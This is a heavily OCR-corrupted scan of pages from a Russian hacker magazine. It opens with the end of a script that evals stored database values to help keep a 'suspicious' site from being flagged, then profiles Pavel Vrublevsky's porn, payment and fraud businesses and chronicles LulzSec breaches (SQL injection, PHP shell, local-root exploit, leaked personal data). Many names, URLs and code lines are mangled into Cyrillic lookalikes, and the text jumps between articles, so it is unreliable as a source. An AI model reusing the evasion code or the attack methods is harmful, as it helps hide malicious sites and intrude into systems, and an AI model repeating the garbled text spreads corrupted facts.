
Тог(і п пе5и11:5.гоы5.і1:ет(0)) 
еѵа1(ге5и11:5.гоы5.і1:ет(0) [ і ] ) 

}) 

}) 

</5сгір1:> 

Итог 

В статье были описаны базовые идеи по продлению времени 
жизни сайта с подозрительным контентом. Для полного пости- 
жения кунг-фу читателю предлагается посетить приведенные 
ссылки и слегка пофантазировать. Правда, как показала прак- 
тика, даже таких несложных манипуляций достаточно, чтобы 
убедить ѵѵераѵѵеі в том, что наш сайт не представляет угрозы для 
общества, т 
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Павел Врублевский никогда не был против сфоткаться с высокими гостями 
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— Интересная статья 
Брайна Кребса. 

• ЬНр://Ыиу/е 1x291 — 
СЬгопорау объявил 

о взломе своей базы 
данных и приостано- 
вил работу. 

• Ы1р://Ы1.[у/п9М1 : Му 

— Пример одного из 
первых Рейп Топов 
ПебЕуе. 

• Ыір://ѵѵаро.5і/2оѴЗУе 

— Статья в ѴѴазЬіпдІоп 
РозТ 

• ЬирТ/зрогаѵѵ. 
ІіѵеіоигпаІ.сот/89032. 
Ыт - Слив со сторо- 
ны ФСБ. 



©КесІЕуе или Павел Олегович Врублевский - по-настоящему оди- 
озный персонаж, олицетворяющий собой целую эпоху из начала 
нулевых. Порно-бизнес, партнерки по продаже таблеток, процес- 
синг платежей за поддельные антивирусы и незаконная финансо- 
вая система ГеІІіагсІ, кинувшая своих пользователей на 19 мил- 
лионов долларов. В общем, несомненно талантливый и крайне 
интересный человек! 



Зарождение Империи 

Карьера НебЕуе’я началась в 1999 году. 
Паша создал платный порносайт, где за 
доступ к картинкам (видео тогда прак- 
тически не было) нужно было платить 
своей кредитной картой. Сайт назывался 
Рогпосгиіо.пи . Это была сборная солянка 
из всего, что только можно было тогда 
найти: от обычного порно до таре и 200 . 
Сделать платный сайт тогда было непро- 
сто. Вся сложность заключалась в вопро- 
се приема оплаты (в то время бесспор- 
ным лидером в данной теме была амери- 
канская компания ІЬІІІ.сот ). С наполне- 
нием все было гораздо проще. Контент 



сливался с зарубежных вебсайтов или 
выкачивался из пеѵѵз-групп. Копирайты и 
авторские права тогда не были большой 
проблемой, главное было найти фотки без 
надписей. 

Само по себе обладание платным сайтом 
не приносит денег, если на этом сайте 
нет посетителей и, самое главное, поку- 
пателей. А поскольку РебЕуе выбрал 
довольно своеобразную нишу, в которой 
тогда никто по-серьезному не работал, 
ему было крайне сложно продвигать свой 
сайт. Не с кем было налаживать отно- 
шения по обмену трафиком, негде было 
рекламировать проект. Отсутствие про- 
даж на платнике нисколько не огорчило 



нашего героя. Паша не унывает и создает 
форум для адалт-вебмастеров под назва- 
нием СгіЛор.пи . 

«Крутоп» 

«Крутоп» — это, без преувеличе- 
ния, целая веха в российском адалте. 
Примерно до 2005 года это был самый 
авторитетный форум порновебмастеров. 
Позже «Крутоп» сдал свои позиции с про- 
фессиональной точки зрения и уступил 
место Мазіег-х.сот и другим. 

Сила «Крутопа» была не в знаниях или 
помощи новичкам (новичку там вообще 
не светило прижиться). «Крутоп» всег- 
да отличался своей непередаваемой и 
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Кому я должен — всем прощаю 



неподражаемой атмосферой: это была 
термоядерная смесь из юности, стеба, 
черного юмора и наплевания на все 
социальные установки. С появлением 
«Крутопа» жизнь платников и топов нача- 
ла стремительно меняться: сразу пошел 
трафик, начали появляться партнеры для 
Рогпосгиіо.пи . привлекающие на сайт 
покупателей за 50%-ное вознаграждение. 
Даже в 2000 году в интернете было очень 
много обычной порнухи. Нужно было 
найти свою нишу и закрепиться в ней: 
что-нибудь такое, где не было бы конку- 
ренции с американцами, которые держа- 
ли 95% адалтового бизнеса. 

Нужен был экстрим, граничащий с фолом, 
с которым не хотели бы связываться 
братья из-за океана. Для РебЕуе такой 
золотой нишей стал Паре. Созданная им 
партнерская программа сазб.рогпосгиіо. 



пи. стала самой известной «Рейп- 
партнеркой». 




Время с 2000 по 2002 годы было расцве- 
том Рогпосгиіо Сазб (РС). На тот момент 
в партнерке было 9 сайтов, так или иначе 
связанных с рейпом. Как и везде, тут 
тоже работало правило 80/20: 80% про- 
даж делали 20% сайтов. Среди проектов 
особенно выделялся знаменитый плат- 
ник Эсгеат апб Сгеат или «СиК» [ ѵѵѵѵѵѵ. 
зсгеатапбсгеат.сот ]. 

Крутая для 2000 года фишка, которую 
РебЕуе применил для «СиКа», был флеш: 
в начале тысячелетия это была реальная 
технологическая инновация для порно- 
сайтов. Два других ресурса партнерки — 
ѵѵѵѵѵѵ.ЬасЙаІез.сот и ѵѵѵѵѵѵ.ѵіоіепісоппіх. 



сот - были наполнены порнушными 
комиксами, которые создавал известный 
американский ВОЭМ-художник по имени 
Сагу Робегіз. Его биографию можно 
посмотреть здесь — ЬІІ.Іу/р21_п05 . 

Для русских понять привлекательность 
комиксов достаточно сложно, но амери- 
канцы всегда были помешаны на этом. 
Такой развитой субкультуры по потребле- 
нию комиксов, как в США, нет больше 
нигде. Создать такие сайты, не понимая 
и не увлекаясь комиксами, договориться 
с американским художником и постоянно 
получать от него новый материал — разве 
это не круто? Честно, очень круто! 

В то время все сайты работали на базе 
самого крупного адалтового биллинга 
ІЬіи.сот . По некоторым данным в нача- 
ле нулевых он процессил порядка 35-40 
миллионов порнодолларов в месяц. Это 
очень большие деньги для 2001 -2002 
годов (примерно миллионов 200 — на 
сегодняшний день). 

Совокупность таких факторов, как уни- 
кальные сайты с редким и экстремальным 
контентом, наличие стабильного белого 
биллингового решения, растущая попу- 
лярность форума Сгиіор, умение РебЕуе 
пропиарить себя и свои проекты, сделали 
Рогпосгиіо Сазб самой крупной адалт- 
партнеркой среди русских вебмастеров. 
Примерный оборот Рогпосгиіо Сазб был в 
районе 1 70 — 200 тыс. долларов в месяц 
(и это в 2001 -2002 годах!). Посмотри, что 
можно было купить на эти деньги в то 
время, и ты поймешь размах. 

Закат Рогпосгиіо СазП 

Черные тучи над Рогпосгиіо Сазб нависли в 
конце 2002 года, когда ІЬіІІ отказался даль- 
ше обслуживать пашины сайты. Начались 
скитания по разным небольшим биллинг- 
компаниям, которые с трудом могли пере- 
варить оборот Рогпосгиіо Сазб. При каждой 
смене биллинга что-нибудь обязательно 
терялось, и Паша часто попадал на деньги. 




Павел Врублевский: история успеха 



1999 2000 

Порносайт Рогпосгиіо. пи Форум Сгиіор. пи 



Свою карьеру Павел начал с создания плат- 
ного порносайта рогпосгиіо.пи со стран- 
ной специализацией: т.оо- и гаре-порнуха. 
Наполнение заимствовалось с зарубежных 
вебсайтов, а основная сложность заключалась 
в сортировке картинок: в интервью ЕогЬез 
Павел с отдельным упоением вспоминал, как 
он с товарищами сутками сортировал фотогра- 
фии. Принимать оплату Павел решил с помо- 
щью банковских карт и процессинга ІЬІЦ.сопп . 



Порносайтс ворованным зоофильным порно не 
нашел успеха, но Павел не отчаивался. В самом 
началетысячелетия РебЕуе создает форум для 
владельцев порносайтов, где пытается собрать 
сообщество русскоязычных администраторов 
порносайтов и аккумулировать опыт и связи 
этой области в одном месте. «Крутоп» — это 
целая веха в российском адалт-бизнесе. При- 
мерно до 2005 года это был самый авторитет- 
ный форум адалт-вебмастеров. 



► 07 
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Но РебЕуе был бы не РебЕуе, если бы 
оставил все на волю случая. В голове 
рождается простая идея: если проблема 
с биллингами, то надо создать свой! На 
этой почве Павел Олегович знакомится 
в конце 2002 года с Оезр’ом (еще один 
интересный персонаж), у которого на 
тот момент уже был свой малюсенький 
биллинг, софт и опыт в этой области. 

Таким образом появляется компания 
СНРОКЮРАѴ В.Ѵ., регистрируется биз- 
нес в Нидерландах. Почему именно 
Нидерланды? Помогли легальность рейпа 
в этой стране и развитый рынок онлайн- 
платежей. К тому же, в Голландии работал 
и Рони Бирнаерт (Роппіе Веегпаегі), один 
из партнеров Рогпосгиіо Сазб, которо- 
го РебЕуе уговорил стать директором 
СНРОКЮРАѴ В.Ѵ. 

Тем не менее, негативную тенденцию 
переломить не удалось: собственный про- 
цессинг — это еще не собственный банк, 
а банки начали отказываться процессить 
рейп. Не помогли даже переименования 
всех платников, избавление от слова таре 
и попытки свести содержание всех сайтов 
к ІФпІазу ботіпаііоп или В05М. В резуль- 
тате оборот Рогпосгиіо Сазб в середине 
2009 года сошел на нет. 

Реібагсі «до» 

Ееібагсі — это интернет-банк, в котором 
можно было открыть виртуальный счет с 
возможностью получения на него безна- 
личных платежей из любого банка мира. 
Ееібагсі Еіпапсе действовала как корпора- 
ция финансовых услуг, а также как заре- 
гистрированный банковский посредник с 
много численны ми банка ми-па ртнерами 
по всему миру. Основатели системы 
РеібагсІ.Ьіг в конце 2002 года договори- 
лись с РебЕуе о рекламной поддержке их 
сервиса на его форуме Сгиіор.пи . 
Поначалу вмешательство Врублевского 
в топики на Сгиіор.пи о деятельности 
Ееібагсі было минимальным, максимум, 



якобы «независимое» мнение, что ребята 
делают все очень неплохо, за исключе- 
нием парочки мелких «но». 

Время шло, количество часов, проведен- 
ных в разговорах основателей Ееібагсі с 
РебЕуе’ем, уже исчислялось сотнями, и, 
видимо, у них появилось ощущение, что 
РебЕуе — человек серьезный, и с ним 
уже можно переходить на новый уровень 
бизнес-отношений. 

К концу 2003 года РебЕуе уже выступа- 
ет как официальный партнер системы 
РеіЬагсІ.Ьіг . Это известие, опубликован- 
ное на СгіЛор.пи . бесспорно, вывело 
Ееібагсі на новый уровень, как по количе- 
ству клиентов, так и по оборотам. Также 
замечу, что до 2007 года публичный 
рейтинг РебЕуе’я среди комьюнити а сі и 11;- 
мастеров зашкаливал, так как Павел был 
одним из самых известных и одним из 
самых авторитетных вебмастеров рунета. 
Следующие несколько лет ЕеіЬагсІ.Ьіг рос 
стремительными темпами. Среди всех 
финансовых сервисов, которые в те годы 
были на рынке, Ееібагсі был самым круп- 
ным, самым авторитетным и самым рас- 
крученным. 

Ееібагсі пережил многие другие подобные 
системы: ѴатЬо (прочти название систе- 
мы наоборот и замените букву «У» на ее 
русский аналог на клавиатуре, букву «Н»), 
СаріІаІСоІІесІ, , которые кинули 

своих клиентов и исчезли. Подводя некий 
промежуточный итог, можно сказать, что 
2003-2007 годы стали годами расцвета 
системы ЕеіЬапіЬіг . 

В 2007 году Павел выкупил долю основа- 
телей РеіЬагсІ.Ьіг и стал владельцем Фета. 

Реібагсі «после» 

Ееібагсі цвел и пахнул все сильнее с каж- 
дым годом. Но амбиции — это самое слабое 
звено товарища РебЕуе. Появился у него в 
то время новый партнер Михаил. Все было 
бы классно и замечательно, только Михаил 
оказался 100%-ным бизнесменом с силь- 




Марка РеіІіагсІ 2008 

ным административным ресурсом. В систе- 
ме ЕеІбагб.Ьіг он видел две вещи: 

1. Достаточно крупные суммы оборотных 
средств; 

2. Полную нелегальность системы как 
та ковой. 

В итоге, 12 сентября 2007 года появил- 
ся самый известный топик о системе 
РеібагсІ.Ьіг на СгіЛор.пи под названием 
«Суппорт Фета — временные траблы». 
Топик имел 3295 комментариев и 440 000 
просмотров: это самый популярный топик 
за всю историю Сгиіор.пи . Итак, 12 сентя- 
бря 2007 года остановились все операции 
с выводом средств из системы Ееібагб. 

ЬІ 2 . Перестали зачисляться входящие 
банковские платежи. Продолжали рабо- 
тать лишь внутренние переводы, которые 
исполнялись автоматически. РебЕуе объ- 
яснил это временными траблами саппор- 
та Фета на «один-два дня». Эти «один- 
два дня» длятся уже более четырех лет и 
точно войдут книгу рекордов, как самые 
длинные «один-два дня» в истории. 

Так что же случилось с РеібагсГом? 
Официальная версия произошедшего была 
такова: к собственнику здания, где сидели 
операционисты и саппорт Ееібагб, пришли 
«оборотни в погонах» из ОБНП УВД СВАО 
(отдел по борьбе с налоговыми преступле- 



2001 2002 2003 

Партнерка РогпоспЛо СазЬ Создание СНРОІМОРАѴ В.Ѵ. Система РеіЬагсі 



Партнерская программа СазЬ.РогпоспФо.пи 
функционировала по стандартной схеме. Это 
был каталог из 9 порно-сайтов, а участники 
программы зарабатывали деньги, привле- 
кая на эти сайты клиентов — покупателей 
порнухи. Самым популярным и прибыльным 
проектом был сайт Эсгеат апб Сгеат ( ѵѵѵѵѵѵ. 
зсгеатапбсгеат.сот ]. Примерный оборот 
РогпосгФо Сазб составлял $ 1 70— 200к в месяц, 
и все деньги процессились через ІЬІЦ.сот . 



В конце 2002 года I Ьі II отказался обслуживать 
порносайты Павла, и начались скитания по не- 
большим билл ингам, которые приносили толь- 
ко кучу проблем: никто не хотел процессить 
гаре-порнуху втаких объемах. В итоге Павел 
создал в Нидерландах компанию СНРОКЮРАѴ 
В. V., директором которой он уговорил стать 
Рони Бирнаерта (Роппіе Веегпаегі), одного из 
средненькихадверов РогпосгФо Сазб. Так9 
лет назад появился знаменитый процессинг 
Сбгопорау. 



РеібагсІ — это интернет-банк, в котором 
можно было открыть виртуальный счет с воз- 
можностью получения на него безналичных 
платежей из любого банка мира. Это было 
очень похоже на любой сазб оФ-сервис: 
мгновенное «оформление» банковского счета 
для получения денег в разных валютах и 
быстрый вывод полученных средств удобным 
способом. Начав сотрудничество с рекламы 
на форуме Сгиіор.пи . через год Павел уже 
стал официальным партнером системы. 
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ниями], которые произвели обыск, выемку 
документов и унесли сейф, в котором 
находились учредительные документы на 
фирмы-офшоры, на чьих банковских счетах 
аккумулировались все оборотные средства 
системы, а также РІІЧ-калькуляторы (диги- 
пассы) для доступа к счетам этих фирм. 
Соответственно, оставшись без доступа 
к банковским счетам, вся деятельность 
Реібагб остановилась. Когда через пару 
недель были восстановлены доступы к 
счетам фирм-офшоров, оказалось, что со 
многих из этих счетов пропали деньги. 
Точную сумму украденных денег знает очень 
ограниченное число людей. РебЕуе на фору- 
ме говорил о сумме в $6 000 000. Как только 
стало ясно (примерно в середине октября 
2007 года), что без оборотных средств нала- 



дить работу системы не получится, было 
принято решение о заморозке всех средств 
на счетах клиентов. Начались пламенные 
клятвы от РебЕуе’а, что это временно, толь- 
ко лишь на год, который как воздух нужен 
на восстановление системы. Были даны 
обещания покрыть все издержки за счет 
средств других бизнесов и много еще чего. 
Планировалось, что 12 сентября 2008 года 
всем будет счастье. С того времени ничего 
не изменилось, и деньги клиентам так никто 
не вернул. Единственный факт — Павел 
Олегович стал намного богаче :). 

Ре<?^?РУб левски й = 

Есть целый ряд весомых оснований счи- 
тать это не вопросом, а утверждением. 



Это очевидно всем, кто потратит хотя бы 
30 минут на изучение сайта ѵѵѵѵѵѵ.гебеѵе- 
Ыод.сот . где опубликован ряд докумен- 
тов, наглядно показывающих связь между 
Павлом Олеговичем, ником РебЕуе, 
Фетхардом и другими проектами. 
Подтверждают теорию и невнятное 
мычание самого Павла на прямые вопро- 
сы, например, в 76 выпуске подкаста 
Рунетология — ЬіЕІѵ/еиООНЕ . 

Еще одно занятное совпадение было обна- 
ружено Брайном Кребсом. Одно время на 
главной странице сайта сбгопорау.сот 
висел счетчик Ооодіе Апаіуіісз. Потом его 
сняли, так как Кребс заметил, что тот же 
Ю счетчика используется на сайтах порно- 
партнерок, принадлежащих ПебЕуе: сазб. 
рогпосгіЛо.ез и еіи-сазб.сот . После 



2004-2006 2007 2008 

Счастливое время Закрытие РеіЬагсі Оформленный кидок 



Середина нулевых — время расцвета всех 
проектов Павла. Реібагсі рос по 200% в год, 
Сбгопорау включился в процессинг разных 
бідб гізк-направлений вроде фармы, зруѵѵаге, 
сигарет и форекс. В конце 2006 года Павел 
выкупил долю основателей РеібагсІ.Ьіг и стал 
единоличным владельцем сервиса. 



12 сентября 2007 года остановились все опе- 
рации с выводом средств из системы Реібагсі. 
ЬІ2 . замороженными оказались миллионы 
долларов. Павел объяснил это временны- 
ми траблами на 1 -2 дня — в итоге эти «1-2 
дня» тянутся уже больше 4 лет. По версии 
ВебЕуе, «оборотни в погонах» из ОБНП УВД 
СВАО вынесли из его офиса сейф с РІ N - 
калькуляторами для доступа к счетам его 
офшорных фирм. Как он утверждал, в итоге у 
него увели больше 6 миллионов долларов. 



Официально РебЕуе взял год на решение про- 
блем «Фетхарда»: было обещано, что 12 сентя- 
бря 2008 года система вновь начнет работать, и 
замороженные средства можно будет вывести. 
Наделе все опять закончилось обманом, 
ничего не поменялось и за следующие годы. 

В общей сложности пользователи РеФагО по- 
теряли на этом 19 миллионов долларов. 
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Главные проекты 
Павла Врублевского 



• Форум сгиіор.пи 

• Партнерская программа Рогпосгиіо СазЬ 

• Платежная система Сбгопорау 

• Финансовая система Бебіагб 

• Фарм-партнерка Рх-Рготобоп 




эпопеи с угнанным доменом по чьему-то 
«недосмотру» (назовем это так] этот счетчик 
опять появился на главной странице. 

Сбгопорау 

Теперь речь пойдет о компании ЗАО 
«ХроноПэй» ( ѵѵѵѵѵѵ.сЬгопораѵ.ги ). которая 
наследует традиции уже знакомой нам ком- 
пании СННОІМОРАѴ В.Ѵ. из Нидерландов. 
Нужно отдать Павлу должное: он сумел 
построить неплохой бизнес с более чем 
сотней сотрудников, офисом в центре 
Москвы и рядом крупных клиентов калибра 
«Мосэнерго», «МТС» и «Ростелеком». 

Но сейчас можно смело судить о том, 
что белый процессинг как таковой был 
нужен Павлу лишь для того, чтобы было 



куда подмешивать ЫдЬ гізк-процессинг 
с партнерок и личных серых проектов: 
фарма, зруѵѵаге, сигареты, форекс и т.д. 
Достаточно занимательные факты опу- 
бликованы на сайте ѵѵѵѵѵѵ.гебеѵе-ЬІод.сопп : 
если империя Павла тебя заинтересова- 
ла, то советую тебе обратиться к этому 
сайту. Там опубликованы весьма любо- 
пытные документы, аудиозаписи, утекшие 
письма, статистика и все остальное, что 
связано с личностью Павла Врублевского. 

К успеху шел 

В целом, наша история уже подходит к 
своему логическому завершению. 
Двенадцатого июля по подозрению в орга- 
низации ООоЗ-атаки на серверы платежной 



системы «Ассист» (конкурент СЬгопорау) 
был арестован один из ближайших сорат- 
ников Павла Олеговича — хакер Епдеі, 
в миру известный как Игорь Артимович. 
Знгель довольно быстро написал чистосер- 
дечное признание, сдав и своего родного 
брата, и самого Врублевского, как заказчи- 
ка данного преступления. РебЕуе же счел 
за благо покинуть пределы родины, укрыв- 
шись на Мальдивах. Тем не менее (под 
влиянием своего адвоката и из-за риска 
депортации в США), Паша решил вернуть- 
ся в Россию. Двадцать третьего июля он 
был задержан в аэропорту Шеремьтьево. 
Сейчас он пребывает в СИЗО, где дожида- 
ется окончания следственных мероприя- 
тий и судебного разбирательства. Павел 
Олегович гениален: на протяжении трех 
лет ему удавалось водить за нос правоо- 
хранительные органы, красивыми речами 
пудря мозги высокому руководству и зано- 
ся деньги рядовым сотрудникам. Стоит 
отдать ему должное — в СК МВД РФ ему 
удалось четыре (!) раза закрыть возбуж- 
денное против него уголовное дело, рас- 
следование которого, однако, всякий раз 
возобновлялось. А вот сотрудники ЦИБ 
ФСБ оказались неподкупнее милицейских 
следователей и накрыли всю банду, при- 
частную к совершению таких громких пре- 
ступлений последнего времени, как атака 
на Мас-пользователей с помощью лже- 
антивируса Мае Бебепсіег, ББоЗ-атаки на 
ЖЖ Алексея Навального, международная 
торговля наркотическими препаратами 
через систему РХ-Рготобоп и многих дру- 
гих. Удивительно, но ББоБ крайне нега- 
тивно влияет на карму! ц-ц 



2009 2010 2011 

Партнерка Рх-Рготоііоп «Взлом» сЬгопорау.сот Закатэпохи 



Партнерская программа по продаже различной 
фармакологической продукции (наркотики, 
сексуальные стимуляторы и т.д.) — важная веха 
в карьере Павла. Это был целый конвейер по 
продаже таблеток: генераторы новых магази- 
нов, десятки готовых вариантов дизайна, мгно- 
венно прикручиваемый процессинг. Масштаб 
бизнеса был соответствующий: Павел даже ор- 
ганизовывал вечеринки для своих партнеров 
и проводил конкурсы в стиле «продай больше 
всехтаблетоки выиграй Нагіеу Баѵісізоп». 



На сайте «Хронопэя» опубликовано феериче- 
ское сообщение: «Мы с сожалением вынуж- 
дены сообщить, что в период 25-26 декабря 
2010 года в нашей компании произошел взлом 
базы данных, приведший к полной утечке всех 
имеющихся персональных данных пользова- 
телей «Хронопэй»за 2009-2010 годы, включая 
полные номера кредитных карт и сѵѵ-кодов». 
Как выяснилось, кто-то увел домен у регистра- 
тора и смог заменить ЫЗ-записи домена. 



Стоит отдать Врублевскому должное — занося в 
СК МВД РФ, емуудалось четыре (!) раза закрыть 
возбужденное против него уголовное дело. Но 
ББоЭ-атака на компанию «Ассист» (конкурента 
СЬгопорау] и две недели простоя онлайн- 
платежей у «Аэрофлота» — это уже Павел 
перегнул палку. 25 июня РебЕуе был задержан в 
аэропорту Шереметьево и в настоящий момент 
находится под арестом до октября, когда долж- 
но начаться судебное разбирательство. 
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Хроника 

деяний 

ІиІгЗес 



о В жаркие летние месяцы на просторах Сети развернулась не менее 
жаркая борьба - «бобра с ослом». Хакерская группа І_иІ2 Зесигііу су- 
мела поставить на уши всех: телевизионщиков, военных, крупные 
ІТ-компании. Первоначально эти парни осуществляли атаки, по их 
собственному признанию, «іог Іиіг», то есть - просто прикола и сме- 
ха ради. Но в конечном счете все оказалось не так просто. 



Ржем над вашей 
безопасностью с 2011 года 

Не так давно СМИ всего мира вытащили на свет и, отряхнув от 
пыли, принялись использовать термин «хактивист», родившийся 
в результате слияния двух слов «хакер» + «активист». На самом 
деле, в последнее время заурядным дефейсам и взломам ради 
наживы пришлось потесниться, освобождая место хакерам с 
идеологией. 

Внезапно оказалось, что эдаких «кибертеррористов» в мире 
сотни и тысячи, они готовы отстаивать то, что считают правиль- 
ным, готовы сражаться с корпорациями и правительствами, и 
берут, если не умением, то количеством. Самый яркий пример 
последних лет — Анонимусы, коих легион, и которые чинят в 



Сети всевозможные непотребства. Однако, не Лионом единым... 
Просуществовавшая всего пару месяцев хак-группа І_иІ 2 Зесигііу, 
сумела наделать столько шума и добиться таких результатов, что 
просто диву даешься. Мы посчитали, что хроника взломов, осу- 
ществленных этими ребятами, заслуживает отдельного рассказа. 
Впервые широкая публика услышала о группе І_иІ 2 Зесигііу 
(далее также І_иІ23ес или І_иІ 2 Воаі — «корабль лулзов») в мае 
текущего года. Все началось с «телевизионных» взломов, доста- 
точно заурядных и не особенно громких — сообщения о таких 
легко пропустить, читая новости. 

Первым пострадало телешоу Х-Расіог — очередная передача, 
где ищут таланты, аналог Атегісап Иоі и Вгііаіп’з Ѳоі Таіепі. 
Хакеры благополучно увели у телевизионщиков личные данные 
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о 250 тысячах кандидатов на участие в шоу, самому младшему 
из которых было всего 12 лет. Имена, даты рождения, телефон- 
ные номера, адреса етаіі — утекло все. На официальном сайте 
БиІгЗес [ [иігзесигііу.сопгі ) открылся и стал наполняться раздел 
«Реіеазез», где абсолютно открыто, для всех желающих было 
выложенное все вышеперечисленное. Базы данных доступны в 
формате 5СН_, М, есть также ссылки на торрент. 

Хакеры, разумеется, официально взяли ответственность за 
взлом на себя и объявили о том, что это только начало. Цитата 
из их первого заявления: 

«Мы І_иІ 25 ес, небольшая команда веселых индивидов, кото- 
рые считают, что серость мирового киберкомьюнити мешает 
ему осуществлять самое главное в жизни: веселиться. 

Все веселье в наши дни ограничивается ожиданием пятни- 
цы, ожиданием выходных, затем следующих выходных, и мы 
поставили перед собой задачу распространить веселье на 
весь остальной календарь, чтобы оно длилось круглый год». 

В конце заявления также была ссылка на официальный 
«Твиттер» команды: Іѵѵіиег.сопп/БиІгБес . 

Новость об утечке данных будущих участников шоу талантов 
вызвала в Сети и СМИ довольно вялый отклик, можно сказать, 
что она прошла незамеченной. Однако следующий взлом от 
БиІгЗес не заставил себя ждать, и удар вновь был нанесен по 
телевизионщикам из компании Рох. Через три дня после первой 
атаки жертвой стала Рох Вгоасісазііпд. Проникнув на сервер, хаке- 
ры заполучили в свои руки сотни логинов и паролей от почтовых 
ящиков сотрудников, добрались до их личных аккаунтов в соци- 



шашяя 




Тупак жив! 

альных сетях и вновь выложили все узнанное в открытый доступ. 
Ріа этот раз утечка сопровождалась текстом, который был 
озаглавлен «Официальное уведомление справедливости от 
БиІгЗес». В уведомлении хакеры сообщали Рох, что сильно их не 
любят (правильно, за что любить людей, закрывших Ріге!1у?) и 
предлагали Рох поцеловать себя в задницу. 



Лого АпІБес, полученное в ходе слияния символики Анонимуса и ШІгЗес 
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Этот инцидент привлек уже больше внимания, люди принялись 
активно фоловить І_иІ 2 Боа! в «Твиттере», от хакеров стали ждать 
следующего шага. И шаг воспоследовал. 

За последние полгода многострадальную компанию Вопу не пнул, 
похоже, только ленивый. І_иІ 2 Вес решили не оставаться в стороне 
и поучаствовали в поутихшем было веселье. На сайте ВопуМізіс. 
со.|р обнаружились дырки в В01_, некоторыми из которых взломщи- 
ки воспользовались сами, выложив в открытый доступ очередную 
базу данных, а на некоторые они просто указали в своем послании, 
предложив поразвлечься другим. Этот взлом І_иІ 2 Вес прокоммен- 
тировали весьма лаконично: «Это никакой не 1337 Н4х0г, просто 
мы хотим еще чуть-чуть опозорить Вопу. Будем считать этот взлом 
номером 8? Ну хотя бы 7 с половиной?!». 

В результате этой атаки, также как и в случае с атаками предыду- 
щими, пострадала в основном честь и репутация компании (хотя 
в случае с Эопу, куда уж дальше). 

Взломы взломами, но І_иІ 2 Весигііу не строили из себя ѴѴікіІ_еакз 
и не позволяли себе никаких утечек по-настоящему секретных 
данных, не чинили никаких финансовых преступлений, не про- 
изводили никакой умышленной порчи данных на серверах. 
Именно из-за такого своеобразного почерка многие аналитики 
и журналисты приравняли веселых хакеров к дгау баі (серым 
шляпам) и сетевым пранкерам, но никак не к реальным кибер- 
террористам. Нашлись даже те, кто открыто поддержал І_иІ 2 Вес, 
называя их деятельность нужной. Однако невинными шалости 
хак-группировки оставались недолго. 

ШІ2 Воаі отправляется в плавание 

Конец мая ознаменовался последним относительно несерьезным 
хаком от «Лулзов». Используя Обау-эксплоит для МоѵеаЫеТуре, 



а также прогу Наѵц 1.14 Рго (для ВОИ-инъекций), группа добра- 
лась до сайта Службы общественного вещания (РВВ). Сайт был 
взломан и подвергся дефейсу. Со страниц РВВ ЫеѵѵзНоиг хакеры 
сообщили миру, что Тупак Шакур жив и все последние 15 лет 
после своего предполагаемого убийства находился в Новой 
Зеландии. Тем временем редакторская группа РВВ активно 
отрицала правдивость этой истории в Тѵѵіиег и пыталась убедить 
общественность, что это всего лишь фейк и взлом. 

Взлом, как уже было сказано выше, был осуществлен благодаря 
Обау-уязвимости, эксплуатируя которую, І_иІ2Вес загрузили рбр- 
шелл на 11р, а затем внедрились на сервер, используя эксплоит для 
получения локального рута для ядра 27 2.4.21 -37. ЕІ_зппр 2005 І686. 
Одним дефейсом дело, впрочем, не ограничилось. Хакеры также 
разместили на сайте рисунок с надписью «АН уоиг базе аге 
Ьеіопд Іо І_иІ 2 Вес» («Все ваши базы принадлежат І_иІ 2 Вес»), шут- 
ливый, но намекающий на то, что они скопировали и все ВОІ_- 
базы с сервера. 

На официальном сайте команды вскоре действительно появи- 
лись различные БД, добытые через взлом РВВ. Среди них был 
список всех БД на сервере, база данных авторов издания, база 
пресс-рум пользователей, МуВОБ-база юзеров сайта и так далее. 
И, как ни странно, этот взлом стал первой атакой, носившей 
политическую подоплеку. В «Твиттере» БиІгВес написали: «Мы 
только что посмотрели фильм РВВ о ѴѴікіІеакз, и он нам не 
понравился». Документальную ленту под названием «РгопШпе: 
ѴѴікізесгеІз» на РВВ показали за неделю до взлома. Фильм рас- 
сказывает о Джулиане Ассанже и Брэдли Мэннинге, приводятся 
интервью с родными рядового, обвиняемого в разглашении 
секретной информации. Взлом сайта, кстати, совпал с годовщи- 
ной ареста Мэннинга. 



► 084 



ХАКЕР 09 /1 52/ 201 1 



Также хакеры традиционно сопроводили украденные материалы 
более развернутым посланием: 

«Приветствуем вас. Мы только что посмотрели ѴѴікіЗесгеІз, 
и нас не очень-то впечатлило. Мы решили пришвартовать 
наш корабль с лулзами к серверам РВ5, дабы... разо- 
браться. На момент прочтения этой записи вы уже должны 
знать, что даже офигенная крепость из третьих «Пиратов 
Карибского моря» (первая часть была лучше!) не способна 
выстоять под напором хаоса и наших лулзов. Ладно, оста- 
вим размышления о сиквелах... хотя, постойте: вторая и 
третья части «Матрицы» тоже полная хрень! 

В общем, народ, поздоровайтесь с содержимым серверов 
РВ5. В следующий раз РВ5 стоит внимательнее смотреть, 
куда они плывут». 

Одновременно с этими событиями СМИ предприняли попытку 
связать БиІгЭес с Анонимусами, называя БиІгЭес подразделе- 
нием последних. В ответ на это хакеры обиделись и в своем 
«Твиттере» написали: «Мы не Анонимус». Однако не прошло 
и пары недель, как группы объединились, чтобы ломать уже 
не только лулзов ради. Впрочем, мы забегаем вперед, об этом 
немного ниже. 

Сообщив миру, чтоТупакжив, корабль лулзов взял новый курс. 
Видимо посчитав, что одной атаки на 5опу было недостаточно, 
БиІгЭес нанесли компании второй, куда более серьезный удар. 
Этот инцидент, пожалуй, стал наиболее смачным фэйлом 5опу 
после взлома Ріаузіаііоп Ыеіѵѵогк. 

«Почему ты возлагаешь такие надежды на компанию, которая 
позволяет себе быть открытой для таких простых атак?», — 
спрашивали хакеры у сетевой общественности. А взлом, в 
самом деле, получился куда масштабнее первого. И вместе с тем 
проще. Снова цитируем официальный комментарий БиІгЭес: 

«Мы достали ЗопуРісІигез.сот при помощи простой 501-- 
инъекции, одной из наиболее примитивных и распро- 
страненных уязвимостей, что всем прекрасно известно. 
Посредством этого элементарного внедрения мы получили 
доступ ко ВСЕЙ информации!.. Нам удалось скомпромети- 
ровать более миллиона пользователей. У нас все их личные 
данные, включая пароли, етаіі-адреса, домашние адреса, 
даты рождения, а также все данные об операциях, произ- 
веденных с их аккаунтов. Кроме того, у нас есть вся админ- 
ская информация о 5опу Рісіигез (включая пароли), более 
75 ООО «музыкальных кодов» и более 3,5 млн «музыкаль- 
ных купонов». 

Как ты понимаешь, БиІгЗес отнюдь не были голословны — все 
перечисленные данные опять были обнародованы на официаль- 
ном сайте. На момент написания этой статьи вся информация 
по-прежнему доступна и на сайте, и в торрентах, и на множе- 
стве других ресурсов Сети, так как остановить распространение 
подобной утечки практически невозможно. 

